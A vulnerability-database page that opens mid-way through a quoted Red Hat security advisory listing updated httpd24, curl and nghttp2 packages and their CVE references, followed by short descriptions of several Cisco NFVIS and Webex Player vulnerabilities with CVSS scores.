httpd24-curl-7.61.1-1.el6.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el6.x86_64.rpm
httpd24-httpd-2.4.34-7.el6.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el6.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el6.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el6.x86_64.rpm
httpd24-libcurl-7.61.1-1.el6.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el6.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el6.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el6.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el6.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el6.x86_64.rpm
httpd24-mod_session-2.4.34-7.el6.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el6.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el6.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
httpd24-curl-7.61.1-1.el6.src.rpm
httpd24-httpd-2.4.34-7.el6.src.rpm
httpd24-nghttp2-1.7.1-7.el6.src.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el6.noarch.rpm
x86_64:
httpd24-curl-7.61.1-1.el6.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el6.x86_64.rpm
httpd24-httpd-2.4.34-7.el6.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el6.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el6.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el6.x86_64.rpm
httpd24-libcurl-7.61.1-1.el6.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el6.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el6.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el6.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el6.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el6.x86_64.rpm
httpd24-mod_session-2.4.34-7.el6.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el6.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el6.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
httpd24-curl-7.61.1-1.el7.src.rpm
httpd24-httpd-2.4.34-7.el7.src.rpm
httpd24-nghttp2-1.7.1-7.el7.src.rpm
aarch64:
httpd24-curl-7.61.1-1.el7.aarch64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.aarch64.rpm
httpd24-httpd-2.4.34-7.el7.aarch64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.aarch64.rpm
httpd24-httpd-devel-2.4.34-7.el7.aarch64.rpm
httpd24-httpd-tools-2.4.34-7.el7.aarch64.rpm
httpd24-libcurl-7.61.1-1.el7.aarch64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.aarch64.rpm
httpd24-libnghttp2-1.7.1-7.el7.aarch64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.aarch64.rpm
httpd24-mod_ldap-2.4.34-7.el7.aarch64.rpm
httpd24-mod_md-2.4.34-7.el7.aarch64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.aarch64.rpm
httpd24-mod_session-2.4.34-7.el7.aarch64.rpm
httpd24-mod_ssl-2.4.34-7.el7.aarch64.rpm
httpd24-nghttp2-1.7.1-7.el7.aarch64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.aarch64.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm
ppc64le:
httpd24-curl-7.61.1-1.el7.ppc64le.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.ppc64le.rpm
httpd24-httpd-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-devel-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-tools-2.4.34-7.el7.ppc64le.rpm
httpd24-libcurl-7.61.1-1.el7.ppc64le.rpm
httpd24-libcurl-devel-7.61.1-1.el7.ppc64le.rpm
httpd24-libnghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.ppc64le.rpm
httpd24-mod_ldap-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_md-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_session-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_ssl-2.4.34-7.el7.ppc64le.rpm
httpd24-nghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.ppc64le.rpm
s390x:
httpd24-curl-7.61.1-1.el7.s390x.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.s390x.rpm
httpd24-httpd-2.4.34-7.el7.s390x.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.s390x.rpm
httpd24-httpd-devel-2.4.34-7.el7.s390x.rpm
httpd24-httpd-tools-2.4.34-7.el7.s390x.rpm
httpd24-libcurl-7.61.1-1.el7.s390x.rpm
httpd24-libcurl-devel-7.61.1-1.el7.s390x.rpm
httpd24-libnghttp2-1.7.1-7.el7.s390x.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.s390x.rpm
httpd24-mod_ldap-2.4.34-7.el7.s390x.rpm
httpd24-mod_md-2.4.34-7.el7.s390x.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.s390x.rpm
httpd24-mod_session-2.4.34-7.el7.s390x.rpm
httpd24-mod_ssl-2.4.34-7.el7.s390x.rpm
httpd24-nghttp2-1.7.1-7.el7.s390x.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.s390x.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
httpd24-curl-7.61.1-1.el7.src.rpm
httpd24-httpd-2.4.34-7.el7.src.rpm
httpd24-nghttp2-1.7.1-7.el7.src.rpm
aarch64:
httpd24-curl-7.61.1-1.el7.aarch64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.aarch64.rpm
httpd24-httpd-2.4.34-7.el7.aarch64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.aarch64.rpm
httpd24-httpd-devel-2.4.34-7.el7.aarch64.rpm
httpd24-httpd-tools-2.4.34-7.el7.aarch64.rpm
httpd24-libcurl-7.61.1-1.el7.aarch64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.aarch64.rpm
httpd24-libnghttp2-1.7.1-7.el7.aarch64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.aarch64.rpm
httpd24-mod_ldap-2.4.34-7.el7.aarch64.rpm
httpd24-mod_md-2.4.34-7.el7.aarch64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.aarch64.rpm
httpd24-mod_session-2.4.34-7.el7.aarch64.rpm
httpd24-mod_ssl-2.4.34-7.el7.aarch64.rpm
httpd24-nghttp2-1.7.1-7.el7.aarch64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.aarch64.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm
ppc64le:
httpd24-curl-7.61.1-1.el7.ppc64le.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.ppc64le.rpm
httpd24-httpd-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-devel-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-tools-2.4.34-7.el7.ppc64le.rpm
httpd24-libcurl-7.61.1-1.el7.ppc64le.rpm
httpd24-libcurl-devel-7.61.1-1.el7.ppc64le.rpm
httpd24-libnghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.ppc64le.rpm
httpd24-mod_ldap-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_md-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_session-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_ssl-2.4.34-7.el7.ppc64le.rpm
httpd24-nghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.ppc64le.rpm
s390x:
httpd24-curl-7.61.1-1.el7.s390x.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.s390x.rpm
httpd24-httpd-2.4.34-7.el7.s390x.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.s390x.rpm
httpd24-httpd-devel-2.4.34-7.el7.s390x.rpm
httpd24-httpd-tools-2.4.34-7.el7.s390x.rpm
httpd24-libcurl-7.61.1-1.el7.s390x.rpm
httpd24-libcurl-devel-7.61.1-1.el7.s390x.rpm
httpd24-libnghttp2-1.7.1-7.el7.s390x.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.s390x.rpm
httpd24-mod_ldap-2.4.34-7.el7.s390x.rpm
httpd24-mod_md-2.4.34-7.el7.s390x.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.s390x.rpm
httpd24-mod_session-2.4.34-7.el7.s390x.rpm
httpd24-mod_ssl-2.4.34-7.el7.s390x.rpm
httpd24-nghttp2-1.7.1-7.el7.s390x.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.s390x.rpm
x86_64:
httpd24-curl-7.61.1-1.el7.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.x86_64.rpm
httpd24-httpd-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el7.x86_64.rpm
httpd24-libcurl-7.61.1-1.el7.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el7.x86_64.rpm
httpd24-mod_md-2.4.34-7.el7.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.x86_64.rpm
httpd24-mod_session-2.4.34-7.el7.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el7.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.4):
Source:
httpd24-curl-7.61.1-1.el7.src.rpm
httpd24-httpd-2.4.34-7.el7.src.rpm
httpd24-nghttp2-1.7.1-7.el7.src.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm
ppc64le:
httpd24-curl-7.61.1-1.el7.ppc64le.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.ppc64le.rpm
httpd24-httpd-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-devel-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-tools-2.4.34-7.el7.ppc64le.rpm
httpd24-libcurl-7.61.1-1.el7.ppc64le.rpm
httpd24-libcurl-devel-7.61.1-1.el7.ppc64le.rpm
httpd24-libnghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.ppc64le.rpm
httpd24-mod_ldap-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_md-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_session-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_ssl-2.4.34-7.el7.ppc64le.rpm
httpd24-nghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.ppc64le.rpm
s390x:
httpd24-curl-7.61.1-1.el7.s390x.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.s390x.rpm
httpd24-httpd-2.4.34-7.el7.s390x.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.s390x.rpm
httpd24-httpd-devel-2.4.34-7.el7.s390x.rpm
httpd24-httpd-tools-2.4.34-7.el7.s390x.rpm
httpd24-libcurl-7.61.1-1.el7.s390x.rpm
httpd24-libcurl-devel-7.61.1-1.el7.s390x.rpm
httpd24-libnghttp2-1.7.1-7.el7.s390x.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.s390x.rpm
httpd24-mod_ldap-2.4.34-7.el7.s390x.rpm
httpd24-mod_md-2.4.34-7.el7.s390x.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.s390x.rpm
httpd24-mod_session-2.4.34-7.el7.s390x.rpm
httpd24-mod_ssl-2.4.34-7.el7.s390x.rpm
httpd24-nghttp2-1.7.1-7.el7.s390x.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.s390x.rpm
x86_64:
httpd24-curl-7.61.1-1.el7.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.x86_64.rpm
httpd24-httpd-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el7.x86_64.rpm
httpd24-libcurl-7.61.1-1.el7.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el7.x86_64.rpm
httpd24-mod_md-2.4.34-7.el7.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.x86_64.rpm
httpd24-mod_session-2.4.34-7.el7.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el7.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):
Source:
httpd24-curl-7.61.1-1.el7.src.rpm
httpd24-httpd-2.4.34-7.el7.src.rpm
httpd24-nghttp2-1.7.1-7.el7.src.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm
ppc64le:
httpd24-curl-7.61.1-1.el7.ppc64le.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.ppc64le.rpm
httpd24-httpd-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-devel-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-tools-2.4.34-7.el7.ppc64le.rpm
httpd24-libcurl-7.61.1-1.el7.ppc64le.rpm
httpd24-libcurl-devel-7.61.1-1.el7.ppc64le.rpm
httpd24-libnghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.ppc64le.rpm
httpd24-mod_ldap-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_md-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_session-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_ssl-2.4.34-7.el7.ppc64le.rpm
httpd24-nghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.ppc64le.rpm
s390x:
httpd24-curl-7.61.1-1.el7.s390x.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.s390x.rpm
httpd24-httpd-2.4.34-7.el7.s390x.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.s390x.rpm
httpd24-httpd-devel-2.4.34-7.el7.s390x.rpm
httpd24-httpd-tools-2.4.34-7.el7.s390x.rpm
httpd24-libcurl-7.61.1-1.el7.s390x.rpm
httpd24-libcurl-devel-7.61.1-1.el7.s390x.rpm
httpd24-libnghttp2-1.7.1-7.el7.s390x.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.s390x.rpm
httpd24-mod_ldap-2.4.34-7.el7.s390x.rpm
httpd24-mod_md-2.4.34-7.el7.s390x.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.s390x.rpm
httpd24-mod_session-2.4.34-7.el7.s390x.rpm
httpd24-mod_ssl-2.4.34-7.el7.s390x.rpm
httpd24-nghttp2-1.7.1-7.el7.s390x.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.s390x.rpm
x86_64:
httpd24-curl-7.61.1-1.el7.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.x86_64.rpm
httpd24-httpd-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el7.x86_64.rpm
httpd24-libcurl-7.61.1-1.el7.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el7.x86_64.rpm
httpd24-mod_md-2.4.34-7.el7.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.x86_64.rpm
httpd24-mod_session-2.4.34-7.el7.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el7.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):
Source:
httpd24-curl-7.61.1-1.el7.src.rpm
httpd24-httpd-2.4.34-7.el7.src.rpm
httpd24-nghttp2-1.7.1-7.el7.src.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm
ppc64le:
httpd24-curl-7.61.1-1.el7.ppc64le.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.ppc64le.rpm
httpd24-httpd-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-devel-2.4.34-7.el7.ppc64le.rpm
httpd24-httpd-tools-2.4.34-7.el7.ppc64le.rpm
httpd24-libcurl-7.61.1-1.el7.ppc64le.rpm
httpd24-libcurl-devel-7.61.1-1.el7.ppc64le.rpm
httpd24-libnghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.ppc64le.rpm
httpd24-mod_ldap-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_md-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_session-2.4.34-7.el7.ppc64le.rpm
httpd24-mod_ssl-2.4.34-7.el7.ppc64le.rpm
httpd24-nghttp2-1.7.1-7.el7.ppc64le.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.ppc64le.rpm
s390x:
httpd24-curl-7.61.1-1.el7.s390x.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.s390x.rpm
httpd24-httpd-2.4.34-7.el7.s390x.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.s390x.rpm
httpd24-httpd-devel-2.4.34-7.el7.s390x.rpm
httpd24-httpd-tools-2.4.34-7.el7.s390x.rpm
httpd24-libcurl-7.61.1-1.el7.s390x.rpm
httpd24-libcurl-devel-7.61.1-1.el7.s390x.rpm
httpd24-libnghttp2-1.7.1-7.el7.s390x.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.s390x.rpm
httpd24-mod_ldap-2.4.34-7.el7.s390x.rpm
httpd24-mod_md-2.4.34-7.el7.s390x.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.s390x.rpm
httpd24-mod_session-2.4.34-7.el7.s390x.rpm
httpd24-mod_ssl-2.4.34-7.el7.s390x.rpm
httpd24-nghttp2-1.7.1-7.el7.s390x.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.s390x.rpm
x86_64:
httpd24-curl-7.61.1-1.el7.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.x86_64.rpm
httpd24-httpd-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el7.x86_64.rpm
httpd24-libcurl-7.61.1-1.el7.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el7.x86_64.rpm
httpd24-mod_md-2.4.34-7.el7.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.x86_64.rpm
httpd24-mod_session-2.4.34-7.el7.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el7.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
httpd24-curl-7.61.1-1.el7.src.rpm
httpd24-httpd-2.4.34-7.el7.src.rpm
httpd24-nghttp2-1.7.1-7.el7.src.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el7.noarch.rpm
x86_64:
httpd24-curl-7.61.1-1.el7.x86_64.rpm
httpd24-curl-debuginfo-7.61.1-1.el7.x86_64.rpm
httpd24-httpd-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-debuginfo-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-devel-2.4.34-7.el7.x86_64.rpm
httpd24-httpd-tools-2.4.34-7.el7.x86_64.rpm
httpd24-libcurl-7.61.1-1.el7.x86_64.rpm
httpd24-libcurl-devel-7.61.1-1.el7.x86_64.rpm
httpd24-libnghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-libnghttp2-devel-1.7.1-7.el7.x86_64.rpm
httpd24-mod_ldap-2.4.34-7.el7.x86_64.rpm
httpd24-mod_md-2.4.34-7.el7.x86_64.rpm
httpd24-mod_proxy_html-2.4.34-7.el7.x86_64.rpm
httpd24-mod_session-2.4.34-7.el7.x86_64.rpm
httpd24-mod_ssl-2.4.34-7.el7.x86_64.rpm
httpd24-nghttp2-1.7.1-7.el7.x86_64.rpm
httpd24-nghttp2-debuginfo-1.7.1-7.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2016-5419
https://access.redhat.com/security/cve/CVE-2016-5420
https://access.redhat.com/security/cve/CVE-2016-5421
https://access.redhat.com/security/cve/CVE-2016-7141
https://access.redhat.com/security/cve/CVE-2016-7167
https://access.redhat.com/security/cve/CVE-2016-8615
https://access.redhat.com/security/cve/CVE-2016-8616
https://access.redhat.com/security/cve/CVE-2016-8617
https://access.redhat.com/security/cve/CVE-2016-8618
https://access.redhat.com/security/cve/CVE-2016-8619
https://access.redhat.com/security/cve/CVE-2016-8620
https://access.redhat.com/security/cve/CVE-2016-8621
https://access.redhat.com/security/cve/CVE-2016-8622
https://access.redhat.com/security/cve/CVE-2016-8623
https://access.redhat.com/security/cve/CVE-2016-8624
https://access.redhat.com/security/cve/CVE-2016-8625
https://access.redhat.com/security/cve/CVE-2016-9586
https://access.redhat.com/security/cve/CVE-2017-7407
https://access.redhat.com/security/cve/CVE-2017-8816
https://access.redhat.com/security/cve/CVE-2017-8817
https://access.redhat.com/security/cve/CVE-2017-15710
https://access.redhat.com/security/cve/CVE-2017-15715
https://access.redhat.com/security/cve/CVE-2017-1000100
https://access.redhat.com/security/cve/CVE-2017-1000101
https://access.redhat.com/security/cve/CVE-2017-1000254
https://access.redhat.com/security/cve/CVE-2017-1000257
https://access.redhat.com/security/cve/CVE-2018-1283
https://access.redhat.com/security/cve/CVE-2018-1301
https://access.redhat.com/security/cve/CVE-2018-1303
https://access.redhat.com/security/cve/CVE-2018-1312
https://access.redhat.com/security/cve/CVE-2018-1333
https://access.redhat.com/security/cve/CVE-2018-11763
https://access.redhat.com/security/cve/CVE-2018-14618
https://access.redhat.com/security/cve/CVE-2018-1000007
https://access.redhat.com/security/cve/CVE-2018-1000120
https://access.redhat.com/security/cve/CVE-2018-1000121
https://access.redhat.com/security/cve/CVE-2018-1000122
https://access.redhat.com/security/cve/CVE-2018-1000301
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_software_collections/3/html/3.2_release_notes/chap-rhscl#sect-RHSCL-Changes-httpd
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBW+qMytzjgjWX9erEAQgLzQ//V6p0MJlmHHuvBRYszVGnu43cqKkSzERl
vPJnEBEdzaU1+hxnBpN+PwWRp+X0j7EIgEnc3yBMSqnKnZUXhbW+2AlWKFSu96i1
WcDdaxtFkD8opjERjN+ckuOnk2Eh24eWAYoDIn0WqTR7seOdvdXsURROOyvugwXP
ulGH+RQhwyxBYvYKp1RmX+REgKfW99wMxpd7B4depYhsI5ZkTzhyTbnp2E+v/XpY
r8NqBJEV0C69sHrddBjvDMl+M0vwPw0X1YWEGsP20tZ3nqGPCVlCegQ+WCUU36HH
1Asxa1s2/50vlY5Aa79iJuAlotw/qy4Cxvm98A33ImBvI1WMfoRXmmkOYcOsTP3o
38fkPK4XuDiimWj+ODq29WsqvjJTZgCD32lw7MgjeyH+0u4aMYnImRtC7tG2ykRU
ETXqLCnQ1I1We2ar3vI9xYLJ+wmc/Iy479eDWziiQztO2RusHxXTStt2n5XEGg1Z
ylahAIyX989zJ3UcSs2h8dbMqjFzHZtie6xEtgFH8fsaPr36HjvKrTzj9rIN2xgt
D1EcxjUVJRp536TzS5ULmAQSAfURruq6xTyuxI9+nDNfFXJbKI5IxIR1W6jkVIMD
N1asv6UUHNzFmJgnmd94AlqDK2iCdoZBwmosk6ICcBmJVrWPMXjBDGNS3GtbKOdj
RkKELMK+M5A=
=7w7/
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201810-0335 | CVE-2018-0462 | Cisco Enterprise NFV Infrastructure Software Input validation vulnerability |
CVSS V2: 6.8 CVSS V3: 4.9 Severity: MEDIUM |
A vulnerability in the user management functionality of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to perform a denial of service (DoS) attack against an affected system. The vulnerability is due to insufficient validation of user-provided input. An attacker could exploit this vulnerability by logging in with a highly privileged user account and performing a sequence of specific user management operations that interfere with the underlying operating system. A successful exploit could allow the attacker to permanently degrade the functionality of the affected system.
Attackers can exploit this issue to cause denial-of-service condition, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCvi09672. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller
| VAR-201810-0334 | CVE-2018-0460 | Cisco Enterprise NFV Infrastructure Software Authorization vulnerability |
CVSS V2: 6.8 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the REST API of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to read any file on an affected system. The vulnerability is due to insufficient authorization and parameter validation checks. An attacker could exploit this vulnerability by sending a malicious API request with the authentication credentials of a low-privileged user. A successful exploit could allow the attacker to read any file on the affected system. Cisco Enterprise NFV Infrastructure Software (NFVIS) Contains an authorization vulnerability.Information may be obtained.
An attacker can exploit this issue to obtain sensitive information that may aid in further attacks.
This issue is being tracked by Cisco bug ID CSCvj07787. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller
| VAR-201810-0333 | CVE-2018-0459 | Cisco Enterprise NFV Infrastructure Software Authorization vulnerability |
CVSS V2: 6.8 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to cause an affected system to reboot or shut down. The vulnerability is due to insufficient server-side authorization checks. An attacker who is logged in to the web-based management interface as a low-privileged user could exploit this vulnerability by sending a crafted HTTP request. A successful exploit could allow the attacker to use the low-privileged user account to reboot or shut down the affected system. Cisco Enterprise NFV Infrastructure Software (NFVIS) Contains an authorization vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state.
Attackers can exploit this issue to cause denial-of-service condition, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCvj07789. The platform can realize the full lifecycle management of virtualized services through the central coordinator and controller
| VAR-201810-0331 | CVE-2018-0457 | Cisco Webex Player Resource management vulnerability |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
A vulnerability in the Cisco Webex Player for Webex Recording Format (WRF) files could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. An attacker could exploit this vulnerability by sending a user a link or email attachment with a malicious WRF file and persuading the user to open the file in the Cisco Webex Player. A successful exploit could cause the affected player to crash, resulting in a DoS condition. For more information about this vulnerability, see the Details section of this security advisory. Cisco Webex Player Contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Cisco Webex Player is prone to a denial-of-service vulnerability.
A remote attacker may exploit this issue to cause denial-of-service conditions.
